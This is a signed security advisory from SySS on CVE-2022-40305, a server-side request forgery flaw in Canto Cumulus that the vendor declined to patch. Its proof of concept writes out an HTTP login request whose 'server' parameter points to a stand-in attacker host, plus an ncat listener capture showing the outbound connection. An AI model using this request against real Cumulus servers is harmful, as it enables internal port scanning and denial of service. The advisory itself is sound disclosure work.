CVE-2022-40305

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-023 Product: Canto Cumulus Manufacturer: Canto Inc. Affected Version(s): Through 11.1.3 Tested Version(s): 11.1.3 (Build 26f5823e) Vulnerability Type: Server-Side Request Forgery (CWE-918) Risk Level: High Solution Status: Mitigation possible Manufacturer Notification: 2022-03-25 Solution Date: No solution Public Disclosure: 2022-06-01 CVE Reference: Not yet assigned Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Canto Cumulus is a digital asset management (DAM).[1] Due to missing validation of untrusted input, the Cumulus web server is vulnerable to server-side request forgery (SSRF) with an unknown proprietary protocol. This behavior poses a risk for denial-of-service (DoS) attacks, impersonation attacks and attacks on the protocol with the theoretical result of remote code execution (RCE) or authentication bypass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When logging in to the web server via the form at the URL https://hostname.example/cwc/login, a hidden URL parameter ‘server’ is sent to the server in the respective HTTP POST request to https://hostname.example/cwc/catalog. Afterwards, the web server establishes a TCP connection to the system specified in that request via an unknown protocol. This yields the following problems: * Denial of service: The web server keeps the TCP connection open for around 60 seconds. This could be misused to fill limited resources on the server or the server’s infrastructure, e.g. NAT tables or connection pools, resulting in a DoS. * Internal port scan: The web server would respond differently if it was able to establish a connection to the specified TCP port. An attacker could use this behavior to conduct a port scan on the internal network. * Authentication bypass (theoretical): As the server is specified during authentication, it might be possible that the server-side request is used to verify the credentials given to the login form. An attacker could pretend to be an authentication server and forge a successful login or elevated privileges to the web application. * Protocol attacks (theoretical): The server-side request uses an unknown binary protocol. An attacker might launch further attacks on that protocol, e.g. buffer overflow or deserialization attacks. In the worst case, if the server implementation of the protocol is vulnerable to such attacks, this will result in RCE on the server. SySS recommends restricting web server-side requests to a limited set of trusted servers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An attacker can specify an arbitrary IP address / hostname and port, as depicted in the following HTTP POST request: POST /cwc/catalog HTTP/1.1 Host: hostname.example User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0 Content-Type: application/x-www-form-urlencoded Content-Length: 123 OWASP_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80 During the response, the web server connects to the specified TCP port on the specified host via an unknown proprietary protocol: # ncat -nlvp 80 | hexdump -C Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from [WAN IP]. Ncat: Connection from [WAN IP]:10402. 00000000 00 00 00 28 72 65 63 6f 00 00 00 02 00 00 00 04 |…(reco…| 00000010 63 4d 49 44 4c 6f 6e 67 73 69 52 51 00 00 00 04 |cMIDLongsiRQ…| 00000020 53 65 72 23 4c 6f 6e 67 00 04 77 7b 00 00 00 18 |Ser#Long…w{…| 00000030 72 65 63 6f 00 00 00 01 00 00 00 04 63 4d 49 44 |reco…cMID| 00000040 4c 6f 6e 67 51 75 69 74 |LongQuit| 00000048 If the specified host responds in an unexpected way, the web server closes the server-side connection and responds to the initial HTTP request with HTTP error code 302 and a redirection to an error page: HTTP/1.1 302 Server: nginx Date: Wed, 23 Mar 2022 16:31:43 GMT Content-Type: text/json;charset=utf-8 Content-Length: 0 Connection: keep-alive Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=16070400 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true If the DNS name cannot be resolved or if the specified TCP port is unreachable, the server responds with HTTP error code 500 and renders the login form with HTML containing an additional error message which states that the server could not be reached. This differing behavior enables the internal port scan. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer has not released a patch and will not address the vulnerability. The manufacturer recommends securing the Cumulus server by using a firewall. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-03-18: Vulnerability discovered 2022-03-25: Vulnerability reported to the manufacturer 2022-05-11: Manufacturer informed SySS that it will not address the vulnerability 2022-06-01: Public disclosure of the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Canto Cumulus https://www.canto.com/de/cumulus/ [2] SySS Security Advisory SYSS-2022-023 (not yet published) https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: [email protected] Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc Key ID: 0xB645 7D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmKWCXIACgkQ6ceYZrZF fXqI7A//ZiwtJccj1fcb1EcVK1l4jHU3ZXcJrcYFib4jqzYgZ+NQXA1OVFmJ8P9a MaK9/9GCTjRUnHL0zJfv2Q18GwDaFcq3Ecv61l0IttgOwPmZk3bdGhbiZbuNkid9 n8WBCtzMoPYb8b8BvGDmbjhGcIWfLBJ4hf9nspeIP12MtYNe0qwYXQJsDrZwmUgu bqD5AnXItyYSDe690LRweAh5vAtdvtp+7SQLOPfi49QyG9sxb9jw1qsK8KVZNutt nIwSD5SFrCCgVvEn6E02FHGW7ttEivxSPTN60FsoGhhCD7V1zeu2teNaZvarETek cnSuYgNNBCdPhCm6WDDMgw5vNOUqg0UE1CqZjZ84DBOu4ABBMF4PV9JBFYbOeWTK XYmVsREJVFnvF+qmXDVfEoByaKsXX1yIZkJwGYFXGS3bvFpaipMGLbRFzc49abPI sv5Vth94AmnTyHsG73tM93d3y5BRLpwxwuRSmG5PRzbuZet8ThPH4Hoc1OAysNTa zsCm3VkSemX0Ba8z6mL4IwuknYoetuKQli37jAx7jGsfetFc9tKvHsk3dQ9w+wQG 040DaLa8NsBh+b1PeQZj6AVC+qH6OgGADl5l0Dnh3VcQW3eWUV0YgQofgOsbili6 6CGZNJwE8HkWX5U4HuTaF/A3b8BaFd0IailYTDGc3SaLz4XOAyU= =FDje -----END PGP SIGNATURE-----